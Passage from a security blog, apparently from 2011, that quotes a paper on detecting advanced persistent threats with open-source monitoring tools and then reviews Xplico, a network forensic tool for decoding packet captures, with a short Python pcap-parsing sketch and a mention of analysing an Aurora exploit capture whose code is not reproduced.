"Advanced Persistent Threat (APT) exhibits discernible attributes or patterns that can be monitored by readily available, open source tools. Tools such as OSSEC, Snort, Splunk, Sguil, and Squert may allow early detection of APT behavior. The assumption is that attackers are regularly attempting to compromise enterprises, from basic service abuse to concerted, stealthy attempts to exfiltrate critical and high value data. However, it is vital to practice heightened operational awareness around critical data and assets, for example, card holder data, source code, and trade secrets. Segment and wrap critical data within the deeper protection of well monitored infrastructure (defense in depth). Small, incremental efforts, targeted at protecting high value data value (typically through smaller and protected network segments), provide far greater gains than broader, less focused efforts on lower value targets. In a similar vein, layered defensive tactics (multiple layers and means of defense) can prevent security breaches and, in addition, buy an organization time to detect and respond to an attack, reducing the consequences of a breach."

This perspective is shared by Jason Andress, in his ISSA Journal cover article, Advanced Persistent Threat Attacker Sophistication Continues to Grow?

Jason's article fortuitously hit the wire at almost exactly the same time our paper went live on the STI site, as if to lend its voice to the argument:

"This paper discusses what exactly APT is, whether or not it is a real threat, measures that can be implemented in order to mitigate these attacks, and why running out to buy the latest, greatest, and most expensive security appliance might not be the best use of resources."

You will find consistent themes, similarly cited references, and further useful resource material in Jason's excellent work. I look forward to seeing more of Jason's work in the ISSA Journal in the future.

In closing, from our paper:

"Even the best monitoring mindset and methodology may not guarantee discovery of the actual APT attack code. Instead, the power of more comprehensive analysis and correlation can discover behavior indicative of APT-related attacks and data exfiltration."

If APT worries you as much as it seemingly does everyone, give the papers a read, take from them what suits you, and employ the suggested tactics to help reduce attack vectors and increase situational awareness.

Cheers and good luck.

Thursday, June 02, 2011

toolsmith: Xplico

Those of you who make use of Network Forensic Analysis tools (NFAT) such as NetworkMiner or Netwitness Investigator will certainly appreciate Xplico.

June's toolsmith covers Xplico, a project released under GPL that decodes packet captures (PCAP), extracting the likes of email content (POP, IMAP, and SMTP protocols), all HTTP content, VoIP calls (SIP), IM chats, FTP, TFTP, and many others.

If you'd like a breakdown of the protocols you can grapple with, check out the Xplico status page.
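If you've never looked inside a packet capture, the container Xplico consumes is simple enough to walk by hand. The following is a minimal Python sketch, assuming the classic libpcap file format with microsecond timestamps (not pcapng); the function name is my own, and this only splits the file into raw packets, leaving all the protocol decoding that Xplico does untouched.

```python
import struct

def iter_pcap_records(data: bytes):
    """Yield (ts_sec, ts_usec, packet_bytes) from a classic libpcap capture."""
    magic = data[:4]
    if magic == b"\xd4\xc3\xb2\xa1":
        endian = "<"  # capture written on a little-endian host
    elif magic == b"\xa1\xb2\xc3\xd4":
        endian = ">"  # capture written on a big-endian host
    else:
        raise ValueError("not a classic microsecond pcap file")
    offset = 24  # skip the 24-byte global header
    while offset + 16 <= len(data):
        # Per-record header: seconds, microseconds, captured length, original length.
        ts_sec, ts_usec, incl_len, _orig_len = struct.unpack_from(
            endian + "IIII", data, offset
        )
        offset += 16
        yield ts_sec, ts_usec, data[offset:offset + incl_len]
        offset += incl_len

# Synthetic one-packet capture so the sketch runs without a real PCAP on disk.
header = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)
record = struct.pack("<IIII", 1, 0, 4, 4) + b"\xde\xad\xbe\xef"
records = list(iter_pcap_records(header + record))
print(records)
```

To try it on a real capture, read the file in binary mode and pass the bytes in; everything above the packet boundary (reassembly, protocol dissection, content extraction) is where a tool like Xplico earns its keep.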

You can imagine how useful Xplico might be for policy enforcement (spot the pr0n), malware detection (spot the Renocide), or shredding IM traffic (spot the data leak).

Experimenting with Xplico is also a great chance to check out Pcapr, Web 2.0 for packets. ;-)

Xplico includes a highly functional Web UI with great case and session management as seen in Figure 1.

Figure 1

With a resurgence of discussion of APT given the recent bad news for RSA, as well as all the FUD spawned by Sony's endless woes, I thought a quick dissection of an Aurora attack PCAP would be worth the price of admission for you (yep, free) as seen in Figure 2.

Figure 2

You'll note the beginning of a JavaScript snippet, tucked into an HTML page, that has only the worst of intentions for your favorite version of Internet Explorer.

Copy all that mayhem to a text file (in a sandbox, please), then submit it to VirusTotal (already done for you here) and you'll note 26 of 42 detections including Exploit:JS/Elecom.D.

Want to carve off just that transaction? Select the pcap under Info from the Site page under the Web menu selection as seen in Figure 3.

Figure 3

Voila!

Ping me via russ at holisticinfosec dot org if you'd like a copy of the above mentioned Aurora PCAPs.

Also, stand by for more on APT detection in outbound traffic in the next day or two.

You're gonna like this tool, I guarantee it.

Check out the article here and Xplico here.

Cheers.
